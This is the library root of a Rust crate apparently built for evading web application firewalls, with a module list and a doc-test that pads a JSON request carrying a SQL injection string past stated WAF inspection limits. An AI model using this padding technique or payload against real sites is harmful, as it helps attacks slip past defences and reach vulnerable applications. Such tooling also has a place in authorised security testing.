wafrift_evolution/lib.rs
1//! wafrift-evolution — Genetic algorithm, differential analysis, and WAF-aware advisor.
2//!
3//! The adaptive feedback loop: detect WAF → analyze differential responses →
4//! evolve technique populations → recommend optimal evasion strategies.
5//!
6//! # Examples
7//!
8//! Inflate a JSON request body past a WAF's inspection-window cap.
9//! Cloudflare and Akamai stop scanning after 8KB; AWS WAF after 16KB.
10//! `body_padding::pad` produces a structure-preserving payload that
11//! still parses on the origin while pushing the attack tokens past
12//! the inspection ceiling:
13//!
14//! ```
15//! use wafrift_evolution::body_padding::{PadOutcome, pad};
16//!
17//! let body = br#"{"q":"' OR 1=1 --"}"#;
18//! let outcome = pad(body, "application/json", 9000);
19//! match outcome {
20//! PadOutcome::Padded { bytes, added } => {
21//! assert!(added >= 9000, "padded by at least 9000 bytes");
22//! assert!(bytes.len() > body.len() + 8000);
23//! // Still parses as valid JSON — origin sees the same payload.
24//! let s = std::str::from_utf8(&bytes).unwrap();
25//! assert!(s.contains("' OR 1=1 --"), "attack payload preserved");
26//! }
27//! other => panic!("expected Padded, got {other:?}"),
28//! }
29//! ```
30//!
31//! Opaque content types (binary blobs) are left alone — padding
32//! would corrupt them:
33//!
34//! ```
35//! use wafrift_evolution::body_padding::{PadOutcome, pad};
36//!
37//! let outcome = pad(&[0u8; 64], "application/octet-stream", 9000);
38//! assert_eq!(outcome, PadOutcome::SkippedOpaque);
39//! ```
40
41pub mod advisor;
42pub mod body_padding;
43pub mod custom_rules;
44pub mod differential;
45pub mod evolution;
46pub mod intelligence;
47pub mod lineage;
48pub mod search;
49pub mod types;